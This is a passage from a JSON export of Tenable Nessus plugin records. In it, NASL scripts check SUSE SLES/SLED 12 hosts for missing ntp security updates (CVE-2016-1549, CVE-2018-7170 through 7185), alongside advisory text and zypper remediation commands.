(bsc#1083422)\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association. (bsc#1083420)\n\n - CVE-2018-7183: ntpq:decodearr() can write beyond its\n buffer limit.(bsc#1083417)\n\nDon't use libevent's cached time stamps in sntp. (bsc#1077445)\n\nThis update is a reissue of the previous update with LTSS channels\nincluded.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 22, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-22T00:00:00", "title": "SUSE SLES12 Security Update : ntp (SUSE-SU-2018:1765-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:ntp-doc", "p-cpe:/a:novell:suse_linux:ntp-debugsource", "p-cpe:/a:novell:suse_linux:ntp-debuginfo", "p-cpe:/a:novell:suse_linux:ntp"], "id": "SUSE_SU-2018-1765-2.NASL", "href": "https://www.tenable.com/plugins/nessus/118269", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1765-2.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118269);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2016-1549\", \"CVE-2018-7170\", \"CVE-2018-7182\", \"CVE-2018-7183\", \"CVE-2018-7184\", \"CVE-2018-7185\");\n\n script_name(english:\"SUSE SLES12 Security Update : ntp (SUSE-SU-2018:1765-2)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ntp fixes the following issues :\n\nUpdate to 4.2.8p11 (bsc#1082210) :\n\n - CVE-2016-1549: Sybil vulnerability: ephemeral\n association attack. While fixed in ntp-4.2.8p7, there\n are significant additional protections for this issue in\n 4.2.8p11.\n\n - CVE-2018-7182: ctl_getitem(): buffer read overrun leads\n to undefined behavior and information leak.\n (bsc#1083426)\n\n - CVE-2018-7170: Multiple authenticated ephemeral\n associations. (bsc#1083424)\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state. (bsc#1083422)\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association. (bsc#1083420)\n\n - CVE-2018-7183: ntpq:decodearr() can write beyond its\n buffer limit.(bsc#1083417)\n\nDon't use libevent's cached time stamps in sntp. (bsc#1077445)\n\nThis update is a reissue of the previous update with LTSS channels\nincluded.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1077445\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082063\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083422\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083424\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083426\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-1549/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7170/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7182/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7183/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7184/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7185/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181765-2/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?df20509a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2018-1188=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-debuginfo-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-debugsource-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-doc-4.2.8p11-64.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T06:46:19", "description": "This update for ntp fixes the following issues :\n\n - Update to 4.2.8p11 (bsc#1082210) :\n\n - CVE-2016-1549: Sybil vulnerability: ephemeral\n association attack. While fixed in ntp-4.2.8p7, there\n are significant additional protections for this issue in\n 4.2.8p11.\n\n - CVE-2018-7182: ctl_getitem(): buffer read overrun leads\n to undefined behavior and information leak.\n (bsc#1083426)\n\n - CVE-2018-7170: Multiple authenticated ephemeral\n associations. (bsc#1083424)\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state. (bsc#1083422)\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association. (bsc#1083420)\n\n - CVE-2018-7183: ntpq:decodearr() can write beyond its\n buffer limit.(bsc#1083417)\n\n - Don't use libevent's cached time stamps in sntp.\n (bsc#1077445) This update is a reissue of the previous\n update with LTSS channels included.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-06-21T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : ntp (SUSE-SU-2018:1765-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:ntp-doc", "p-cpe:/a:novell:suse_linux:ntp-debugsource", "p-cpe:/a:novell:suse_linux:ntp-debuginfo", "p-cpe:/a:novell:suse_linux:ntp"], "id": "SUSE_SU-2018-1765-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110639", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1765-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110639);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2016-1549\", \"CVE-2018-7170\", \"CVE-2018-7182\", \"CVE-2018-7183\", \"CVE-2018-7184\", \"CVE-2018-7185\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : ntp (SUSE-SU-2018:1765-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ntp fixes the following issues :\n\n - Update to 4.2.8p11 (bsc#1082210) :\n\n - CVE-2016-1549: Sybil vulnerability: ephemeral\n association attack. While fixed in ntp-4.2.8p7, there\n are significant additional protections for this issue in\n 4.2.8p11.\n\n - CVE-2018-7182: ctl_getitem(): buffer read overrun leads\n to undefined behavior and information leak.\n (bsc#1083426)\n\n - CVE-2018-7170: Multiple authenticated ephemeral\n associations. (bsc#1083424)\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state. (bsc#1083422)\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association. (bsc#1083420)\n\n - CVE-2018-7183: ntpq:decodearr() can write beyond its\n buffer limit.(bsc#1083417)\n\n - Don't use libevent's cached time stamps in sntp.\n (bsc#1077445) This update is a reissue of the previous\n update with LTSS channels included.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1077445\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082063\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083422\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083424\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083426\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-1549/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7170/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7182/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7183/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7184/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7185/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181765-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2c461920\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2018-1188=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2018-1188=1\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2018-1188=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-1188=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2018-1188=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2018-1188=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2018-1188=1\n\nSUSE Enterprise Storage 4:zypper in -t patch\nSUSE-Storage-4-2018-1188=1\n\nSUSE CaaS Platform ALL :\n\nTo install this update, use the SUSE CaaS Platform Velum dashboard. It\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1|2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1/2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ntp-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ntp-debuginfo-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ntp-debugsource-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ntp-doc-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ntp-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ntp-debuginfo-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ntp-debugsource-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"ntp-doc-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ntp-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ntp-debuginfo-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ntp-debugsource-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"ntp-doc-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"ntp-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"ntp-debuginfo-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"ntp-debugsource-4.2.8p11-64.5.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"ntp-doc-4.2.8p11-64.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T06:44:45", "description": "This update for ntp fixes the following issues :\n\n - Update to 4.2.8p11 (bsc#1082210) :\n\n - CVE-2016-1549: Sybil vulnerability: ephemeral\n association attack. While fixed in ntp-4.2.8p7, there\n are significant additional protections for this issue in\n 4.2.8p11.\n\n - CVE-2018-7182: ctl_getitem(): buffer read overrun leads\n to undefined behavior and information leak.\n (bsc#1083426)\n\n - CVE-2018-7170: Multiple authenticated ephemeral\n associations. (bsc#1083424)\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state. (bsc#1083422)\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association. (bsc#1083420)\n\n - CVE-2018-7183: ntpq:decodearr() can write beyond its\n buffer limit.(bsc#1083417)\n\n - Don't use libevent's cached time stamps in sntp.\n (bsc#1077445)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-04-17T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : ntp (SUSE-SU-2018:0956-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:ntp-doc", "p-cpe:/a:novell:suse_linux:ntp-debugsource", "p-cpe:/a:novell:suse_linux:ntp-debuginfo", "p-cpe:/a:novell:suse_linux:ntp"], "id": "SUSE_SU-2018-0956-1.NASL", "href": "https://www.tenable.com/plugins/nessus/109085", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:0956-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109085);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/09/10 13:51:47\");\n\n script_cve_id(\"CVE-2016-1549\", \"CVE-2018-7170\", \"CVE-2018-7182\", \"CVE-2018-7183\", \"CVE-2018-7184\", \"CVE-2018-7185\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : ntp (SUSE-SU-2018:0956-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ntp fixes the following issues :\n\n - Update to 4.2.8p11 (bsc#1082210) :\n\n - CVE-2016-1549: Sybil vulnerability: ephemeral\n association attack. While fixed in ntp-4.2.8p7, there\n are significant additional protections for this issue in\n 4.2.8p11.\n\n - CVE-2018-7182: ctl_getitem(): buffer read overrun leads\n to undefined behavior and information leak.\n (bsc#1083426)\n\n - CVE-2018-7170: Multiple authenticated ephemeral\n associations. (bsc#1083424)\n\n - CVE-2018-7184: Interleaved symmetric mode cannot recover\n from bad state. (bsc#1083422)\n\n - CVE-2018-7185: Unauthenticated packet can reset\n authenticated interleaved association. (bsc#1083420)\n\n - CVE-2018-7183: ntpq:decodearr() can write beyond its\n buffer limit.(bsc#1083417)\n\n - Don't use libevent's cached time stamps in sntp.\n (bsc#1077445)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1077445\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082063\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083422\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083424\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083426\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-1549/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7170/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7182/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7183/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7184/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7185/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20180956-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4d795c38\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-648=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2018-648=1\n\nSUSE CaaS Platform ALL :\n\nTo install this update, use the SUSE CaaS Platform Velum dashboard. It\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", 